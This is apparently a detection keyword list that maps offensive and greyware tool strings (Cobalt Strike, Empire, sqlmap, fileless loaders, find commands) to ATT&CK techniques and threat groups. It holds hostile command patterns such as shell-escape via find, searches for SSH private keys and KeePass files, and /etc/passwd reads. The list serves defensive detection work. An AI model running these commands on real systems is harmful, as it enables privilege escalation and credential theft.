+"*FiercePhish*","offensive_tool_keyword","FiercePhish","FiercePhish is a full-fledged phishing framework to manage all phishing engagements. It allows you to track separate phishing campaigns. schedule sending of emails. and much more. The features will continue to be expanded and will include website spoofing. click tracking. and extensive notification options. ","T1566 - T1566.001 - T1566.002 - T1566.003","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Phishing","https://github.com/Raikia/FiercePhish","1","1","N/A","N/A","10","1214","273","2023-05-18T15:38:38Z","2016-12-31T19:41:24Z" +"*Fiesta Exploit Kit*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*File_Smuggler_Http_Handler*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*FileControler/FileControler_x64.dll*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*FileControler/FileControler_x86.dll*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*File-Extensions-Wordlist.txt*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" +"*fileless-elf-exec*","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" +"*FilelessPELoader.cpp*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" +"*FilelessPELoader.exe*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" +"*FilelessPELoader.vcxproj*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" +"*FilelessPELoader-main*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" +"*FilelessShellcode.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*FilelessShellcode.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*FilelessShellcode.sln*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*FilelessShellcode.vcxproj*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*filemsf.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*--file-read=/etc/passwd*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*files/BindShell.exe*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*files/team-edward.py*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*filezilla2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*-filter *(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32*","greyware_tool_keyword","dsquery","Finding users Not Required to Have a Password","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","APT41 - FIN8","Discovery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations","1","0","N/A","7","10","N/A","N/A","N/A","N/A" +"*-filter *(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304*","greyware_tool_keyword","dsquery","Finding accounts with Kerberos Pre-Authentication Disabled","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","APT41 - FIN8","Discovery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations","1","0","N/A","7","10","N/A","N/A","N/A","N/A" +"*-filter *(&(objectClass=User)(msDS-AllowedToDelegateTo=*","greyware_tool_keyword","dsquery","Finding accounts with constrained delegation","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","APT41 - FIN8","Discovery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations","1","0","N/A","7","10","N/A","N/A","N/A","N/A" +"*-filter *(&(objectClass=user)(servicePrincipalName=*)(!(cn=krbtgt))(!(samaccounttype=805306369*","greyware_tool_keyword","dsquery","Finding Kerberoastable Users","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","APT41 - FIN8","Discovery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations","1","0","N/A","7","10","N/A","N/A","N/A","N/A" +"*-filter *(&(objectClass=User)(serviceprincipalname=*)(samaccountname=* -limit 0 -attr samaccountname serviceprincipalname*","greyware_tool_keyword","dsquery","Finding accounts with SPNs","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","APT41 - FIN8","Discovery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations","1","0","N/A","7","10","N/A","N/A","N/A","N/A" +"*-filter *(userAccountControl:1.2.840.113556.1.4.803:=524288)*","greyware_tool_keyword","dsquery","Finding accounts with unconstrained delegation","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","APT41 - FIN8","Discovery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations","1","0","N/A","7","10","N/A","N/A","N/A","N/A" +"*finalrecon.py --*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*find . -exec /bin/sh \; -quit*","greyware_tool_keyword","find","It can be used to break out from restricted environments by spawning an interactive system shell.","T1059.004 - T1219 - T1027","TA0002 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*find . -name spring-beans*.jar*","offensive_tool_keyword","Spring4Shell","Spring4Shell Proof Of Concept/Information CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BobTheShoplifter/Spring4Shell-POC","1","0","N/A","N/A","4","335","106","2022-11-09T15:46:06Z","2022-03-30T07:54:45Z" +"*find / * -4000 -type f -print*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*find / * -perm -2000 -type f -print*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*find / * -regextype egrep -iregex*\.kdbx*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*find / -name authorized_keys *> /dev/null*","greyware_tool_keyword","find","Find sensitive files","T1083 - T1213.002 - T1005","TA0007 - TA0010","N/A","N/A","discovery","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*find / -name id_dsa 2>*","greyware_tool_keyword","find","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*find / -name id_rsa *> /dev/null*","greyware_tool_keyword","find","Find sensitive files","T1083 - T1213.002 - T1005","TA0007 - TA0010","N/A","N/A","discovery","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*find / -name id_rsa 2>*","greyware_tool_keyword","find","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*find / -perm /2000 -ls 2>/dev/null*","greyware_tool_keyword","find","Find SGID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Discovery - Privilege Escalation","N/A","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*find / -perm +4000 -type f 2>/dev/null*","greyware_tool_keyword","find","Find SUID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Discovery - Privilege Escalation","N/A","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*find / -perm +8000 -ls 2>/dev/null*","greyware_tool_keyword","find","Find SGID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Discovery - Privilege Escalation","N/A","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*find / -perm -2000","greyware_tool_keyword","find","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.# sticky bits","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege escalation","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*find / -perm -4000","greyware_tool_keyword","find","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.# sticky bits","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege escalation","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*find / -perm -4000 -type f *","greyware_tool_keyword","find","Find SUID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Discovery - Privilege Escalation","N/A","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*find / -perm -g=s","greyware_tool_keyword","find","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # sticky bits","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege escalation","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*find / -perm -u=s","greyware_tool_keyword","find","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. sticky bits","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege escalation","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*find / -perm -u=s -type f 2>/dev/null*","greyware_tool_keyword","find","Find SUID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Discovery - Privilege Escalation","N/A","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*find / -perm -u=s -type f -group */dev/null*","greyware_tool_keyword","find","Find SUID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Discovery - Privilege Escalation","N/A","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*find / -uid 0 -perm -4000 -type f *","greyware_tool_keyword","find","Find SUID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Discovery - Privilege Escalation","N/A","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*find / -user root -perm -6000 -type f 2>*","greyware_tool_keyword","find","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*find /* -perm -04000 -o -perm -02000*","greyware_tool_keyword","find","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*find /* -perm -u=s -type f 2>*","greyware_tool_keyword","find","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*find_and_load_coerce_methods*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*find_domain.sh *","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*find_payload(*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*Find-4624Logons*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-4648Logons*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*FindAdminAccessComputers*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*Find-AdminLogonScripts.ps1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*find-allvulns*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Find-AmsiAstSignatures -*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*Find-AmsiPSTokenSignatures -*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI 